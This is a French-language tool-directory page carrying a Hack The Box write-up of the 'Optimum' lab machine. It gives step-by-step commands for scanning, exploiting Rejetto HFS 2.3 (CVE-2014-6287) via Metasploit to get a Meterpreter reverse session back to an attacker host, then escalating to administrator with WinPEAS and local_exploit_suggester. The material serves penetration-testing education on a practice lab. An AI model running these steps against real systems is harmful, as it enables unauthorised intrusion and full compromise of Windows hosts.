Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/r3fr4kt/optimum
Escalade de PrivilègesReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionApprentissage et Éducation
GitHub
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Analyse de la machine Optimum de Hack The Box. Cette procédure pas à pas couvre l'exploitation de Rejetto HttpFileServer 2.3 (CVE-2014-6287) pour obtenir un accès initial, suivie d'une élévation de privilèges sur un hôte Windows à l'aide de techniques d'énumération et d'outils de post-exploitation.

r3fr4kt/optimum

Optimum

Voir le dépôt
Partager

Optimum


Optimum – Hack The Box Writeup

Aperçu

Dans cette machine, l'objectif est d'obtenir un accès initial à un hôte Windows en exploitant un service web vulnérable, puis d'élever les privilèges pour récupérer le drapeau administrateur.

Le chemin d'attaque a impliqué :

  • Énumération des services
  • Exploitation de Rejetto HTTP File Server 2.3
  • Accès initial via Metasploit
  • Élévation de privilèges à l'aide de WinPEAS et des modules post-exploitation de Metasploit

Reconnaissance

Nous commençons par un scan complet des ports TCP pour identifier les services exposés.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

Le scan révèle le port 80 ouvert.

Ensuite, nous effectuons un scan de service et de version.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

Le résultat identifie le service suivant :

root@kitploit:~
HttpFileServer 2.3

Ce service correspond à Rejetto HTTP File Server, un serveur web de partage de fichiers léger.


Identification de la vulnérabilité

Après avoir recherché la version détectée, nous découvrons une vulnérabilité connue :

root@kitploit:~
CVE-2014-6287

Cette vulnérabilité permet l'exécution de code à distance en raison d'une désinfection incorrecte des entrées.


Exploitation

Pour exploiter la vulnérabilité, nous utilisons Metasploit.

Lancer Metasploit :

root@kitploit:~
msfconsole -q

Rechercher le module approprié :

root@kitploit:~
search rejetto

Charger le module d'exploit :

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

Configurer les options requises :

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

Une fois exécuté, l'exploit fournit une session Meterpreter sur la machine cible.


Accès initial

Avec la session Meterpreter obtenue, nous naviguons dans le système de fichiers pour récupérer le drapeau utilisateur.

root@kitploit:~
cd
cat user.txt
whoami

La sortie de la commande montre que nous sommes connectés en tant que :

root@kitploit:~
kostas

Étant donné que cet utilisateur n'a pas de privilèges administratifs, nous procédons à l'élévation de privilèges.


Énumération pour l'élévation de privilèges

Pour identifier les vecteurs potentiels d'élévation de privilèges, nous téléchargeons WinPEAS, un outil bien connu d'énumération d'élévation de privilèges sous Windows.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

Nous l'exécutons ensuite :

root@kitploit:~
shell
.\wp.exe

La sortie révèle des informations utiles, notamment les identifiants associés à l'utilisateur kostas.


Élévation de privilèges

Après avoir examiné les vecteurs d'élévation possibles, nous utilisons le module Metasploit :

root@kitploit:~
local_exploit_suggester

Charger le module :

root@kitploit:~
use post/multi/recon/local_exploit_suggester

Configurer la session :

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

Ce module suggère des exploits locaux possibles pouvant être utilisés pour élever les privilèges.

Après avoir réussi à élever les privilèges, nous obtenons un shell avec des droits administratifs.

Vérification :

root@kitploit:~
shell
whoami

Accès administrateur

Une fois les privilèges administratifs obtenus, nous naviguons vers le répertoire Administrateur pour récupérer le drapeau root.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

Points clés à retenir

Cette machine démontre plusieurs concepts importants de test d'intrusion :

  • Une énumération de services appropriée est cruciale pour identifier les logiciels vulnérables.
  • Les vulnérabilités publiquement connues telles que CVE-2014-6287 peuvent conduire à une exécution de code à distance immédiate.
  • Des outils comme WinPEAS aident à identifier les opportunités d'élévation de privilèges dans les environnements Windows.
  • Les modules post-exploitation de Metasploit peuvent accélérer le processus d'élévation de privilèges.
Télécharger l’outil